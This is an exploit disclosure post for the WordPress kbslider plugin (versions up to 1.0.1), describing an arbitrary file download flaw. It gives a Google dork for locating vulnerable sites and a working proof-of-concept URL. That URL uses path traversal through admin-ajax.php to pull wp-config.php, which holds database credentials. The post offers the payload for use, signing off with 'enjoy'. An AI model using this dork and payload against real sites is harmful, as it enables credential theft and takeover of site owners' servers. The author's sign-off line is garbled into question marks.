facebook facebook twitter rss

Wordpress kbslider <= 1.0.1 Arbitrary File Download

Author: wlhaan hacker , Published: 01-10-2014
######################
# Exploit Title : Wordpress kbslider <= 1.0.1 Arbitrary File Download

# Exploit Author : wlhaan hacker

# Vendor Homepage : http://wordpresspluginsamples.com/kbslider

# Dork Google: kbslider.php "index of"

or
Index of /wp-content/plugins/kbslider


# Date : 2014-08-11

# Tested on : Windows 7 / Mozilla Firefox
Linux / Mozilla Firefox


######################

# Description

Wordpress Wordpress kbslider <= 1.0.1 suffers from Arbitrary File Download


######################

# PoC

http://victim/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php

enjoy:)


#####################

Discovered By : wlhaan hacker


??? ?? ????? ???? ??? ?????



https://twitter.com/waleedal3ybani
https://www.facebook.com/waleed.alaibani



#####################

Like us on Facebook :